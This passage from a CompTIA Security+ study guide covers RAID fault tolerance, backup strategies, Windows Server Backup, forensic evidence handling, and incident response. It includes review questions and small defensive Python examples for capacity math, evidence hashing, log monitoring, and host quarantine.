array fails, the data that was stored on the failed drive can be recreated from the parity data on
the remaining drives. RAID 5 has the read performance increase you'd see with RAID 0, plus it
includes fault tolerance without using as much disk space as RAID 1.
RAID 6 Similar to RAID 5, but requires at least four disks and includes twice the parity data. This way,
up to two disks can fail without any loss of data.
RAID 10 A nested RAID level, also known as RAID 1+0. Nested RAID levels combine RAID 0 (data
striping) with other RAID techniques. RAID 10 combines RAID 1 (mirroring) with RAID 0
(disk striping), making it a stripe of mirrors. RAID 10 requires at least four hard drives: two mirrored
pairs of disks, which are then striped together. Other nested
RAID levels include RAID 01, RAID 100, RAID 50, and RAID 60.


RAID arrays of any kind can fail. As long as you're not using RAID 0, a single drive failure won't cause the
whole array to fail. In fact, most arrays use hot-swappable drives so that you can replace a failed drive and
rebuild the array without shutting it down. This process reduces performance temporarily, but eliminates downtime. A
bigger problem is that drives aren't the only thing that can fail. If the RAID controller fails, or if malware or
other software writes bad data to the disk, it doesn't matter how many mirrored or parity disks you have.
Disks can even fail due to the stress of a rebuild. For these reasons, never use RAID as a substitute for making
regular data backups.
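
To make the capacity trade-offs above concrete, here's a small Python sketch that estimates usable space for
the common RAID levels, assuming identically sized drives. Real controllers and nested levels vary, so treat
it as an approximation rather than a definitive calculation.

# A simple sketch of RAID capacity trade-offs, assuming identical drive sizes.

def usable_capacity(level, drives, size_per_drive_gb):
    if level == 0:                      # striping: all space usable, no redundancy
        return drives * size_per_drive_gb
    if level == 1:                      # mirroring: one drive's worth of unique data
        return size_per_drive_gb
    if level == 5:                      # one drive's worth of space used for parity
        return (drives - 1) * size_per_drive_gb
    if level == 6:                      # two drives' worth of space used for parity
        return (drives - 2) * size_per_drive_gb
    if level == 10:                     # striped mirrors: half the raw space
        return (drives // 2) * size_per_drive_gb
    raise ValueError("level not covered in this sketch")

for level, drives in [(0, 2), (1, 2), (5, 4), (6, 4), (10, 4)]:
    print(f"RAID {level} with {drives} x 1000 GB drives:",
          usable_capacity(level, drives, 1000), "GB usable")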

Discussion: Fault tolerance and recovery


1. Identify single points of failure in your organization's network or other systems.
Answers may vary, but can include network hardware, critical systems, power, or so on.
2. Consider fault tolerant or redundant controls that could reduce the risks associated with those single
points of failure.
Answers may vary, but can include redundant components or equipment, backup power, and so on.
3. Does your organization have any alternate sites for critical operations?
Answers may vary. A business with multiple facilities might have that as it is.
4. Do you or your organization use RAID for data storage?
Answers may vary, but it's common for high performance, high availability, or large capacity servers and
SANs.

Data backups
Implemented properly, RAID reduces your need for traditional backups, but it will never replace them. If the
controller fails, if an attack or application error wipes your data, or if something happens to the physical array
itself, the data will be gone forever—a problem that can bankrupt entire businesses. Whether you're using
redundancy systems or not, you should perform periodic backups of sensitive data to external media in case
something happens to the system.

Exam Objective: CompTIA SY0-501 2.2.11


How often you should back up important data depends on how often it changes, and how short you want the
associated RPO to be. For example, you might want a transaction database backed up nightly, or even
constantly to the cloud, but only create system image backups immediately after installation or major updates
and configuration changes.
Most operating systems, Windows included, come with some sort of backup software built in. It's usually
pretty basic, but more elaborate solutions are available from third parties. Depending on the type, they might
back up to an external hard drive, to a network drive, to magnetic tapes or optical media, or even to a cloud
service. Some even use a two-stage process, copying first to a hard drive and then backing that up to a tape.
Network and cloud backups are especially popular as continual backup systems, while scheduled backups are
more likely to use hard drives or tapes. For serious data security, you'll always want to maintain at least one
set of off-site backups too, in case something happens to your facility itself.

Backup types
Backups can take a lot of time, use a lot of space, and since they need both processing and disk access they
hurt performance while they're going on. Since most data on a system doesn't change every day, you can save
a lot of time by focusing on what's changed rather than backing up the whole system every time. The hard part
is being certain what's backed up and what isn't. In Windows file systems, a useful tool is the archive bit in
each file's properties. Windows sets the archive bit when a file is created or modified: backup utilities can
then clear the bit to mark a file as backed up.

Exam Objective: CompTIA SY0-501 5.6.3


When you perform or schedule backups, first you need to instruct the software what files, folders, or volumes
to include in the backup. Which files are included in any particular backup depends on the type of backup you
choose.
Full Backs up all files whether their archive bits are set or not, and clears the archive bit for all
files. This creates a "complete" backup that can fully restore a selected volume, and makes it
easy to track subsequent changes.
Incremental Backs up only files with a set archive bit, then clears the bit. An incremental backup saves all
changes since the last full or incremental backup. This is a much quicker process than a full
backup. To restore individual files, you only need the latest incremental backup containing
each file. To fully restore the volume, you need all incremental backups you've made, plus
the original full backup. This makes restorations more complex and time-consuming.
Differential Backs up only files with a set archive bit, but does not clear the bit afterward. This means that
each subsequent differential backup will have the full set of changes made since the last full
backup; it also means that each subsequent differential backup will be larger and take longer.
However, restoring from differential backups is easier: you only need the original full backup
and the most recent differential backup.
Snapshot A type of backup made to quickly capture the state of a system at a given point without greatly
impacting ongoing operations. Snapshots take a virtual copy of the running system and then
perform the backup from that. They can be full, incremental, or differential, and can complete
much more quickly than traditional backups, but they require systems and software that
support them. Snapshots are popular for VMs or high-availability databases.
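
If you find the archive-bit behavior easier to follow in code, the following toy Python model (not real backup
software) shows which files each backup type would select and what it does to the archive bit afterward. The
file names are made up for illustration.

# A toy model of how the archive bit drives full, incremental, and differential backups.
files = {"report.docx": True, "db.bak": True, "notes.txt": False}  # True = archive bit set

def full_backup(files):
    backed_up = list(files)                 # everything, bit set or not
    for name in files:
        files[name] = False                 # clear every archive bit
    return backed_up

def incremental_backup(files):
    backed_up = [n for n, bit in files.items() if bit]
    for name in backed_up:
        files[name] = False                 # clear the bit: the next run skips these
    return backed_up

def differential_backup(files):
    return [n for n, bit in files.items() if bit]   # bits deliberately left set

print(full_backup(dict(files)))         # all three files
print(incremental_backup(dict(files)))  # only files with the archive bit set
print(differential_backup(dict(files))) # same selection, but the bits stay set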

Especially since you're going to be creating multiple backups, it's not a matter of choosing a type of backup
and sticking to it, but rather planning a backup schedule and using appropriate backup types. For an example
scenario, imagine that you back up one volume on a critical server every weekday evening, and you want a
backup archive going back four weeks. The volume (somewhat unrealistic but with convenient math) has a
relatively constant 100 GB of files on it, and about 5 GB of files change on any given day. You back data up
to tape, at a speed of 50 GB/hour, and restore at the same rate. You might consider the following three
options:
 A full backup every night. This means two hours of running backup every night (though if it's
scheduled after hours this doesn't require human attention), and a total storage capacity of 2000 GB for
four weeks of backups. If there's a failure on the server, you just need to replace the drive and take two
hours to restore from the most recent backup.
 A full backup every Friday night, and an incremental backup the other four days of the week. This
means two hours of backing up on Friday, and six minutes on every other night. Since incremental
backups are only 5 GB, you only need 120 GB per week, or 480 GB for the whole four week set. If you
need to restore from an archive, you need the full backup and all incrementals made since then. This
means a failure late in the week increases your restore time.
 A full backup every Friday night and a differential backup the other four days. Unlike incremental
backups, each differential backup is larger than the one before: 5 GB on Monday, 10 GB on Tuesday,
and so on. This means it takes a little longer every day. It also means the total storage you need is
larger: 150 GB a week, or 600 GB total. The benefit is that if you need to restore from a backup on
Friday morning, you don't need the whole set of daily backups: you only need last week's full backup,
and today's differential.

In that example, full backups might be a good option: 2000 GB isn't that hard to archive today, and the time to
run backups isn't a big concern if you're letting them run unattended after hours. When backups become larger
(and thus slower) or you want to run them more frequently, incremental and differential backups become
much more advantageous.
Choosing between differential and incremental backups is a little more complicated: incremental backups are
quicker to create and use the least total space, while differential backups make quick restoration easier (if still
not as easy as full backups). Cloud backups, and other continual backup solutions, almost always rely on
incremental backups along with back-end software that takes most of the version-control work out of the end
user's hands.
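
The storage figures in the example above reduce to simple arithmetic, and the short Python sketch below
reproduces them. The values come straight from the scenario; the function itself is just for illustration.

# Weekly and four-week storage for the three strategies in the example scenario.
FULL_GB, DAILY_CHANGE_GB = 100, 5
DAYS_PER_WEEK, WEEKS = 5, 4

def weekly_storage(strategy):
    if strategy == "full":          # five full backups a week
        return FULL_GB * DAYS_PER_WEEK
    if strategy == "incremental":   # one full backup plus four 5 GB increments
        return FULL_GB + DAILY_CHANGE_GB * 4
    if strategy == "differential":  # one full backup plus 5, 10, 15, and 20 GB differentials
        return FULL_GB + sum(DAILY_CHANGE_GB * d for d in range(1, 5))

for strategy in ("full", "incremental", "differential"):
    weekly = weekly_storage(strategy)
    print(f"{strategy}: {weekly} GB per week, {weekly * WEEKS} GB for four weeks")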

Backup security
Backups are themselves sensitive data, and that means you need to make sure they're not lost and don't fall
into the wrong hands. Some important points to keep in mind:

Exam Objective: CompTIA SY0-501 5.6.4.1

 Keep backup media clearly labeled and physically secure.


 Store and transmit backup archives on the network with the same security you would use for the
original files.
 Transport backups securely: use encryption over insecure networks, and physical security for external
media.
 Keep recent backups in an off-site location, such as another facility owned by your organization, or a
company specializing in data storage.
 Securely erase or physically destroy backup media to prevent dumpster diving.

Security isn't just about keeping the archives from being lost or stolen though: you also need to make sure that
they work. If you're using faulty equipment or incorrect configurations that you can't restore fully from, the
whole backup process just becomes a false sense of security. At the minimum, regularly check backup media
for file integrity. For a more complete test, restore individual files or even the whole archive to a test system.
Not only will practicing restoration procedures test the media, it will make sure personnel are used to doing it
when a real disaster hits.
Cloud-based backups are very convenient, but add a whole new set of security worries. Cloud backup is a form
of risk transference, since you're trusting the cloud provider to preserve your data's confidentiality, integrity,
and availability. Choose a provider with those needs in mind, and ensure that your business agreement clearly
specifies responsibilities and liabilities for both parties. You also must be aware of any legal issues involved
in storing your particular data with a third party, especially if data sovereignty laws might apply.
Finally, don't forget that backup media doesn't last forever. Whether you're using tapes, hard drives, or
anything else, track how much use each unit has seen, and replace it according to manufacturer
recommendations. Dispose of backup media as you would any other media containing sensitive information.


Creating backup policies


Knowing good backup practices is important, but it's critical that you also have a firm written policy for
creating backups, approved by both management and IT administrators as suiting your backup needs.
Otherwise, there are just too many chances for something to go wrong.

1. For each system or data set, identify what should be backed up.
2. Determine the retention requirements for each backup.
In addition to your organization's internal needs, consider data retention requirements for regulatory
compliance.
3. Choose a backup strategy and schedule according to your RTO, RPO, and storage capacity.
4. Choose how data will be kept secure.
5. Assign personnel responsibilities.
6. Create and apply a backup testing schedule.

Creating Windows backups


While third-party backup solutions are best for enterprise situations or exacting needs, you can schedule
regular backups using built-in Windows utilities. The exact backup procedure will depend on your version of
Windows, but the procedure generally includes the following steps.

1. Open your backup tool.

Windows version Backup tool

Windows 7 and Windows 10 Backup and Restore

Windows 8 and Windows 8.1 File History

Windows Server Windows Server Backup or the wbadmin command-line tool (must be
installed as a server feature)

2. Choose a location to store the backed up files.


Removable devices, network storage, offsite backup, and cloud vendors each have benefits and
drawbacks.
3. Choose the files you want to back up, if you want to back up files that aren't in the common Windows
folders.
To enable quick recovery of your entire system drive, choose the option to create a system image. You
can do this separately from or along with your usual data backups.
4. Set a schedule for the backups. You can typically choose anywhere from hourly to weekly.
5. Start the backup, if it doesn't start automatically.


Exercise: Using Windows Server Backup


Windows includes basic backup and recovery tools. In Windows Server, you'll need to install the Windows
Server backup feature.

Do This / How & Why

1. In Windows Server 2012, install the Windows Server Backup feature.

   a) In Server Manager, click Manage > Add Roles and Features. The Add Roles and Features Wizard
      window opens.
   b) Click Next four times. Skip the Select server roles screen and move to Select features.
   c) Check Windows Server Backup and click Next.
   d) Click Install. The process might take a few minutes.
   e) Click Close.

2. Schedule a backup.

   a) In Server Manager, click Tools > Windows Server Backup. The wbadmin console opens.
   b) In the left pane, click Local Backup.
   c) In the Actions pane, click Backup Schedule. The Backup Schedule Wizard window opens.
   d) Click Next. You're asked whether to back up the whole server, or custom files and volumes.
   e) Click Next to select the full server backup. On the next screen, you can choose a backup time.
   f) From the Select time of day list, select 2:00 AM and click Next. You could even specify multiple
      backups per day.

3. Choose a backup location. In a real-world situation you'd have a dedicated location for backups. In this
   case, there's a shared folder on the host computer.

   a) Examine your backup options. You can back up to a dedicated hard drive, a specific volume on a
      drive, or a shared network folder.
   b) Select Back up to a shared network folder and click Next. Click OK to close the warning window.
   c) Enter the location of the shared folder on your host computer. It should be something like
      \\VBOXSVR\Backups
   d) Click Next. A login window appears.
   e) Enter Administrator's username and password, then click OK.
   f) At the Confirmation screen, click Finish. You may receive an error that keeps the backup from
      finalizing, due to the shared folder situation on the hypervisor. In a real-world situation, you'd be
      using a more suitable location anyway.

4. Click Close.


Assessment: Fault tolerance and recovery


1. Which of the following RAID levels incorporates disk striping?
 RAID 0
 RAID 1
 RAID 5
 RAID 10

2. The process of rebuilding a RAID drive from parity data can cause a RAID drive to fail.
 True.
 False.

3. If you have a RAID implementation with data parity, you don't need data backups.
 True.
 False.

4. You have a critical database server that constantly backs its files up to the cloud, but its software
environment is so finicky that if it encountered a critical failure it would take a long time to get it working
again. How would you describe your recovery plan for that service?
 High RPO and high RTO
 High RPO and low RTO
 Low RPO and high RTO
 Low RPO and low RTO

5. Clustering is similar to load balancing, but tends to use tighter integration between redundant systems.
True or false?
 True
 False


6. Your company rents a spare server room in a secondary location. It has all necessary hardware, software,
and network services, and you just need to load the latest backups to get it in operation. What is it?
Choose the best answer.
 Hot site
 Hot spare
 Cold site
 Cold spare

7. In terms of time, how does a differential backup plan generally differ from an incremental backup plan?
 It's quicker both to create backups and to restore data
 It's quicker to create backups, but slower to restore data
 It's slower to create backups, but quicker to restore data
 It's slower both to create backups and to restore data

8. What backup type might require specific operating system support? Choose the best response.
 Differential
 Full
 Incremental
 Snapshot


Module C: Incident response


If you're lucky enough, all the time you spend working on security will be wasted because you never suffer
any successful attacks or data loss. That's a dangerous goal to bank on, so instead you should be hoping you
prepare well enough that when the incident happens the damage will be limited. When the inevitable attack
comes, even if your defenses come out unscathed, you'll still need a better response plan than sitting there and
looking smug.
You will learn:
 How to collect forensic evidence
 About incidents
 How to respond to an incident

Forensic evidence
You should always document your work, both to make sure everything's been done properly and to inform
future activities. Especially when something goes wrong, complete and well-organized evidence of what's
happened is the best way to make sure you understand the entire problem and how to keep it from recurring.
If we could all trust each other, you could stop there, but when a problem results from malicious activity or
just employee negligence, you need to be able to prove it to hold the responsible party accountable. You might
even need to prove that you're not lying to get someone else in trouble or to cover up your own wrongdoing.
Forensics is the science of collecting evidence that's admissible in court. To be admissible, forensic evidence
needs to be relevant to a legal case, sufficient in detail to prove a claim, and have a documented chain of
custody proving that it was collected legitimately and hasn't been altered since. Forensic investigation is
necessary for any evidence you plan to use in a civil or criminal court proceeding, and many organizations
apply forensics to formal internal investigations. These three settings might require different standards of
proof, so it's important to have a legal adviser available whenever you collect forensic evidence.
Legal evidence can fall into multiple categories, and you might need to gather any of them as part of an
investigation.

Testimony A sworn statement, oral or written, by a person with knowledge relevant to the
case. Testimony might be from a witness to disputed events, or from an expert on
the evidence or facts being discussed in the case.
Real evidence A physical object presented to prove a point. In a murder trial, the weapon or DNA
found on the scene would be real evidence. Also called physical evidence.
Demonstrative evidence Representations of objects or events. Photographs, medical X-rays, audio or video
recordings, drawings, or models are all examples of demonstrative evidence.
Demonstrative evidence that's in the form of written documents or other media is
often called documentary evidence.
Digital evidence Evidence that's recorded or transmitted in a digital format. Digital evidence can be
video or audio, transaction logs, email messages, databases, backups, or almost
anything else stored on a computer or electronic device. Since many types of
digital evidence are extremely easy to modify or even fabricate outright,
guaranteeing its authenticity is a particular challenge.


Collecting evidence
When you collect forensic evidence, especially digital evidence, it's critical to make sure that it's complete,
and also that it's verifiably authentic. You can achieve the first by being methodical in your collection: it's
better to collect too much at first and have to pare it down later than it is to miss something. The second
requires maintaining an audit trail establishing a chain of custody from the discovery of the evidence to its
presentation in court. The audit trail exists to show that the evidence was legally collected and its integrity
was preserved. Each piece of evidence needs to be uniquely labeled, and have its own documentation
including a chronological record of custody transfers. In the case of digital evidence, cryptographic hashes are
an essential tool in verifying no alteration has taken place.

Exam Objective: CompTIA SY0-501 5.5


When conducting a forensic investigation it's also important to track man-hours and other expenses both for
the evidence gathering and for repairing any damages that were done. Not only will your superiors want to
know what the incident and related investigation cost for their own sake, the figures might also be needed to
calculate damages in a civil or criminal suit.
Remember that a forensic investigation isn't just about making sure your results are authentic and complete.
They also need to give answers relevant to the case. Think of the questions that a judge or review board might
ask—the who, what, when, where, and how of the events you're documenting.

1. Secure physical and remote access to any systems or data relevant to the investigation before they can be
accidentally or deliberately altered.
2. If important evidence is in the custody of another person or business entity, you may be able to access it
through an eDiscovery process. This can take a while: to prevent its alteration or destruction before then,
act quickly in conjunction with legal staff to place it under a legal hold.
3. Classify available evidence according to order of volatility. By collecting the most time-sensitive or easily
changed evidence first, you minimize the chance of losing it. On a typical computer, the order of
volatility might be as follows.
a) CPU registers and cache memory
b) Routing tables, ARP cache, process tables, and kernel stats
c) Other RAM contents
d) Swap files or other temporary file systems
e) Other data on hard drives or flash media
f) Remote logging data
g) Firmware or physical configuration
h) Archival media such as optical discs or printouts
4. Capture evidence using relevant tools.
• Review system and network logs to record events or trends.
• Actively log ongoing attacks, both to gather intelligence about the attacker and counterintelligence that
can be used to protect against similar attacks in the future.
• System images can perfectly record the state of an affected system. Specialized forensic backup
software is better suited for the purpose than ordinary backups are. Some can even capture the contents
of system memory as well as what is on disk.
• If data has been deleted but not completely erased or destroyed, it can often be recovered using a variety of
tools. Exactly what can be recovered depends on how securely the original data was erased, and on
how much time and expense you're prepared to put into recovery.
• Screenshots are an easy way to record volatile data, and are sometimes clearer and more concise than
system logs.


• Collect relevant surveillance videos, and consider recording video of your collection process in order
to answer any later questions.
• Workstations, and even many servers, often have their system time set incorrectly, never mind those
actually located in different time zones. Even a slight discrepancy can make log files misleading, so
record the time offset for each affected system so that you can determine the real-world time for every
logged event.
• Speak with witnesses as soon as possible. Collect written statements or recorded interviews in order to
keep a permanent record of what they saw.
• Massive Big Data sets used in some industries are impractical to copy or fully investigate with normal
techniques. If your investigation requires it, you will need special tools and expertise.
5. Take hashes of all collected digital data, and store them securely along with documentation of the collection
process. Any later alteration of the data will change the hash (see the sketch after these steps).
6. Analyze collected data to mark what is and is not relevant to the case. For example, unaltered system files
on a disk image aren't likely important, but user documents may well be. Some forensic tools are
specialized for this.
7. Assemble your findings into a report including a summary of the items investigated, the steps taken
during the investigation, and potentially relevant evidence.
Note: Confidential data that's become evidence is still confidential. Even if you have to reveal it to a
courtroom, you still need to keep it secure against unauthorized viewing or copying by anyone else.
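
As a minimal sketch of the hash-verification idea from step 5, the Python example below computes a SHA-256
hash of an evidence image at collection time and re-checks it later. The file path is a hypothetical example,
and real investigations would normally use dedicated forensic tools that record hashes automatically.

# Hash evidence when it's collected, and re-hash later to show it hasn't changed.
import hashlib

def sha256_of_file(path, chunk_size=1 << 20):
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()

# At collection time, record the hash alongside the chain-of-custody entry.
original_hash = sha256_of_file("evidence/disk_image.dd")

# Later (for example, before presenting the evidence), verify it.
if sha256_of_file("evidence/disk_image.dd") == original_hash:
    print("Image unchanged since collection")
else:
    print("Image has been altered; integrity cannot be demonstrated")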

Discussion: Forensic evidence


1. Have you been involved in any security incidents where forensic data handling was important?
Answers may vary.
2. Search on the web for forensic backup and eDiscovery software. Note the common features they offer.
Results may vary.

Incident response teams


When an incident occurs time is critical, so not only do you need a clear incident response policy, you also
need to identify and train an incident response team (IRT) that will be prepared to handle things properly when
the need arises. Incident response teams vary by field: in information security you'll most commonly see
computer security incident response teams (CSIRT). Exactly how big the team needs to be depends on the size
of your organization and the scope of the incident, and it's often a good idea to train a variety of people as
incident responders and then assemble teams as needed with skills suited to a particular incident. Areas of
expertise a full incident response team might need include:

Exam Objective: CompTIA SY0-501 5.4.1.2, 5.4.1.4

Leadership Not only do you need someone with the organizational skill to direct the others,
you need someone with the authority within your organization to get the access
and resources needed to fix the problem.
Technical knowledge Each team needs at least one administrator, engineer, or other expert that's familiar
with any affected systems, and who can advise the rest of the team on the
technical nature of the incident and how to address it.
Security principles Security experts are trained in security principles. They should know how to
recognize attacks, collect forensic evidence, document procedures, and suggest
remedies. In many incidents, security and technical experts will need to work in
tandem.

CompTIA Security+ Exam SY0-501 495


Chapter 11: Disaster planning and recovery / Module C: Incident response

Human resources Incidents frequently involve employee actions, whether or not they are at fault.
When an employee becomes involved in an investigation you should consult HR
as to how to proceed.
Legal adviser While a security expert should know something about forensics, larger scale
incidents may raise additional legal or policy questions which legal staff are better
equipped to address.
Communications Publicly visible incidents, or those that directly impact users or customers, require
someone to communicate with those affected. Careless statements can compound
incidents in any number of ways. Even if it's not a controversial affair, a single
spokesperson for the incident response team reduces the chance of confusing other
parties.

Some team members should also be trained as first responders. They're the ones who immediately react to an
alert to investigate an incident, then determine its nature and scope. First responders must have the technical
knowledge to work with affected systems, and the security training to recognize attacks and follow forensic
principles. For minor incidents, the first responder might end up doing all the work and filing a report to
management. For major incidents, the first responder only contains things until the full team is on site.

The incident response process


Depending on your organization and what happens, the incident response process can be pretty simple. For
instance, you might respond to harmless but annoying spam email by adding the sender to a block list and
notifying your ISP. On the other hand, responding to a damaging incident or serious data breach might be a
big project in itself. Generally speaking, you can break incident response into seven distinct phases. (NIST
actually combines some of those steps into a four-phase process, but seven shows the detail a little more when
you're learning.)

Exam Objective: CompTIA SY0-501 5.4.2

1: Preparation Having tools and training in place before an incident occurs.


2: Identification Clearly detecting not only when an incident has occurred, but its nature and severity.
3: Containment Quarantining an incident to prevent spread. It may include stopping damaging events,
or just observing them in containment.
4: Investigation Identifying the precise effects and root causes of the incident.
5: Eradication Eliminating the root cause of the incident and preventing immediate recurrence.
6: Recovery Restoring services, validating proper operation, and otherwise returning the network to
its baseline state.
7: Lessons learned Reviewing information gathered during the previous steps and taking appropriate
action.

Remember that the goal of the entire process is to assess damage done to your organization's assets, and
minimize losses. It's also important from the start to apply forensic principles so that evidence won't be lost or
rendered inadmissible in future legal proceedings.

Preparing for incidents


Incidents can happen at any time and require immediate response, so the first step is to be thoroughly
prepared. This goes hand-in-hand with prevention, but it's not the same thing: no matter how carefully you
harden your network you can only make serious incidents less common, not eliminate them entirely.
Preparation is a crucial step, since how well you educate and equip your response team will determine how
the whole response process plays out.

496 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

Exam Objective: CompTIA SY0-501 5.4.1.1, 5.4.1.3, 5.4.1.5

 Develop policies and checklists for the identification and isolation of incidents.
 Document expected incident types and categories and how the nature of each affects the response
process.
 Create and maintain an organizational disaster recovery plan.
 Choose and train an event response team with a sufficiently broad set of skills.
 Conduct exercises based on likely or past incidents, in order to test the team's ability to respond.
 Ensure that the response team has sufficient authority and permissions to react appropriately in case of
an emergency.
 Equip the team with any tools needed for anticipated incidents.
 Educate other employees and users about their rights and duties in the incident response process, such as
privacy expectations and reporting requirements.
 Monitor system events both to detect security incidents and for later research in case of an incident.
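
As a concrete illustration of the monitoring point above, here is a minimal sketch that scans a Linux-style authentication log for repeated failed logins. The log path, regular expression, and alert threshold are assumptions; in practice this role is usually filled by a SIEM or IDS rather than an ad hoc script.

    import re
    from collections import Counter

    LOG_PATH = "/var/log/auth.log"   # assumed location; varies by distribution
    THRESHOLD = 5                    # failed attempts before raising an alert

    FAILED = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+)")

    def failed_logins(log_path=LOG_PATH):
        """Count failed SSH logins per source IP address."""
        counts = Counter()
        with open(log_path, errors="ignore") as log:
            for line in log:
                match = FAILED.search(line)
                if match:
                    counts[match.group(2)] += 1
        return counts

    if __name__ == "__main__":
        for ip, count in failed_logins().items():
            if count >= THRESHOLD:
                print(f"ALERT: {count} failed logins from {ip}")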

Identifying incidents
If you're prepared, you'll be constantly monitoring events, and trying to determine which are potential security
incidents. Regardless of whether you're relying on automated systems or human observations, a false positive
can trigger an alert and force you to waste resources on an event that was entirely benign. At the same time,
that's better than a false negative where the damage is done without anyone even noticing.

1. Rely on multiple sources for information, including IDS, administrator review of logs and monitoring
systems, and user reports of suspicious or unusual activity.
2. Examine anything that seems out of the ordinary to determine whether it requires immediate action.
• Examine system logs and configuration files related to the event as well as the initial alert.
• Distinguish whether it is ordinary activity or a potential threat.
• Make a decision quickly but accurately: slow response to an emergency can be disastrous, but so can
the wrong response.
3. Evaluate the incident's nature. This doesn't just help to determine the potential severity, but also how to
proceed.
• Unauthorized access
• Data breach
• Theft
• Vandalism
• Unlawful activity
• Malware
• Improper usage
• Denial of service
• Scans, probes, or attempted access

CompTIA Security+ Exam SY0-501 497


Chapter 11: Disaster planning and recovery / Module C: Incident response

4. Evaluate the incident's scope and severity.


• How many systems are affected?
• How critical are the affected systems or data?
• What is still at risk?
• Is the incident time-critical?
5. Escalate the incident appropriately by communicating your findings to the IRT, management, and
whoever else is relevant to the specific event type.
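
The evaluation and escalation steps above can be turned into a simple decision aid. This is only a sketch: the categories mirror the list above, but the scoring weights, thresholds, and recommendations are assumptions you would replace with your own escalation policy.

    # Rough severity weights per incident type; adjust to local policy.
    TYPE_WEIGHT = {
        "unauthorized access": 3, "data breach": 5, "theft": 4,
        "vandalism": 3, "unlawful activity": 4, "malware": 3,
        "improper usage": 2, "denial of service": 3, "scan or probe": 1,
    }

    def triage(incident_type, systems_affected, critical_data, time_critical):
        """Return a coarse severity score and an escalation recommendation."""
        score = TYPE_WEIGHT.get(incident_type, 2)
        score += min(systems_affected, 10) // 2     # scope
        score += 3 if critical_data else 0          # criticality of systems or data
        score += 2 if time_critical else 0          # urgency
        if score >= 8:
            action = "Escalate immediately to the full IRT and management"
        elif score >= 5:
            action = "Notify the IRT lead and begin containment planning"
        else:
            action = "Log the event and continue monitoring"
        return score, action

    print(triage("data breach", systems_affected=4, critical_data=True, time_critical=True))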

Containing incidents
Once your team knows the type and level of incident they're dealing with, you're ready to contain it. The goal
of containment is to keep the incident from escalating and to minimize operational impact to the organization.
For forensics purposes, it's also important not to destroy or obscure evidence of the incident's cause.
Depending on the nature and severity of an incident, there might be several options or stages in containment.

 Shutting affected services or systems down entirely


 Quarantining affected systems from the network
 Allowing affected systems to operate, but directly monitoring them
 Temporarily repairing recognized or introduced vulnerabilities to prevent further damage
 Securing related or vulnerable assets
 Bringing backup systems online
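
For network-level quarantine in particular, a first responder might script a temporary block. The sketch below assumes a Linux host or gateway where iptables is available and the script runs with sufficient privilege; it drops traffic from a suspect address while leaving evidence on the affected system untouched.

    import subprocess

    def quarantine_ip(ip_address):
        """Insert a temporary firewall rule dropping traffic from a suspect host."""
        subprocess.run(
            ["iptables", "-I", "INPUT", "-s", ip_address, "-j", "DROP"],
            check=True,
        )

    def release_ip(ip_address):
        """Remove the quarantine rule once the incident is resolved."""
        subprocess.run(
            ["iptables", "-D", "INPUT", "-s", ip_address, "-j", "DROP"],
            check=True,
        )

    if __name__ == "__main__":
        quarantine_ip("203.0.113.45")   # documentation-range address used only as an example

Record the time and reason for any such rule: containment actions are themselves events that the later investigation will need to account for.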

Investigating incidents
At this point you should have some idea of what has happened, but you probably haven't had the luxury to get
a complete picture. A thorough investigation isn't just important for solving problems and preventing
recurrence: it's also vital for gathering any evidence you'll need for the followup process. This means you
need to keep written documentation of whatever you find and whatever you do in responding to the incident.
If there's a chance of criminal activity, civil liability, or even just formal organizational proceedings, you need
to treat this step as a forensic investigation. In that case, you'll need to use a process called electronic
discovery, or eDiscovery, where you identify, secure, and analyze data with the intent of using it in a criminal
or civil court case. Even if you don't need to follow strict forensic standards, the principles of formal evidence
gathering are good to keep in mind.

1. Determine what data needs to be collected. If you're not certain, it's better to collect too much than too
little.
2. Include any information placed on a legal hold by other involved parties. If information not in your
organization's control is relevant, coordinate with an attorney to establish a legal hold on it.
3. Secure physical and remote access to any systems or data relevant to the investigation before they can be
accidentally or deliberately altered.
4. Document the scene (whether physical or digital) as you found it.
• Document any known changes made during containment or before the area was fully secured.
• Use forensic backup software to make disk images, copy memory, or save configuration files; these
applications will preserve valuable information conventional backup software will not.
• Verify that the gathered information will answer any questions (Who, What, Where, Why, and How) that may
come up in a later investigation.

498 CompTIA Security+ Exam SY0-501


Chapter 11: Disaster planning and recovery / Module C: Incident response

5. Secure the confidentiality, integrity, and authenticity of your findings. For a forensic investigation this
means a full chain of custody. For an ordinary investigation you just need to make sure it's accurate and
doesn't cause any security leaks itself.
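
Whether or not the full forensic standard applies, the documentation itself can be kept in a simple append-only form. The sketch below is one way to do it; the file name and fields are assumptions rather than a formal standard, but one timestamped record per action on an evidence item is the kind of trail a chain of custody is built from.

    import getpass
    import json
    from datetime import datetime, timezone

    CUSTODY_LOG = "custody_log.jsonl"   # one JSON record per line, append-only

    def record_action(item_id, action, sha256=None, notes=""):
        """Append a timestamped custody record for an evidence item."""
        entry = {
            "timestamp_utc": datetime.now(timezone.utc).isoformat(),
            "handler": getpass.getuser(),
            "item": item_id,
            "action": action,          # e.g., "collected", "imaged", "transferred"
            "sha256": sha256,
            "notes": notes,
        }
        with open(CUSTODY_LOG, "a") as log:
            log.write(json.dumps(entry) + "\n")
        return entry

    record_action("disk-image-01", "collected", sha256="ab12...", notes="Workstation WS-114, bay 2")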

Eradicating problems
Once you know you won't be losing or destroying valuable evidence, you can get on with the next step:
eliminating the root cause of a problem and repairing any affected systems. Like every other step, exactly
what this takes depends on what the incident was and how much damage it did, and you will need to
document the process for later review.

1. Clean up the damage.


• Repair or replace damaged hardware.
• Remove infected software or unauthorized accounts.
• Replace passwords or other credentials for compromised accounts.
• Fully restore systems from installation media or trusted backups.
• Restore the network structure.
2. Based on current knowledge, harden the network against recurrence.
• Install any relevant updates and patches.
• Disable unnecessary services.
• Revise configuration files, ACLs, or other network settings.
3. Notify relevant personnel that all affected systems have been cleaned and secured.
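
Removing unauthorized accounts is easier if you can compare the current state against a known-good baseline. This is a minimal Linux-specific sketch; the baseline file is an assumption, and configuration-management and endpoint-protection tools offer equivalent checks.

    def local_accounts(passwd_path="/etc/passwd"):
        """Return the set of local account names on a Linux system."""
        with open(passwd_path) as f:
            return {line.split(":", 1)[0] for line in f if line.strip()}

    def unexpected_accounts(baseline_path="account_baseline.txt"):
        """Report accounts that were not present in the saved baseline."""
        with open(baseline_path) as f:
            baseline = {line.strip() for line in f if line.strip()}
        return sorted(local_accounts() - baseline)

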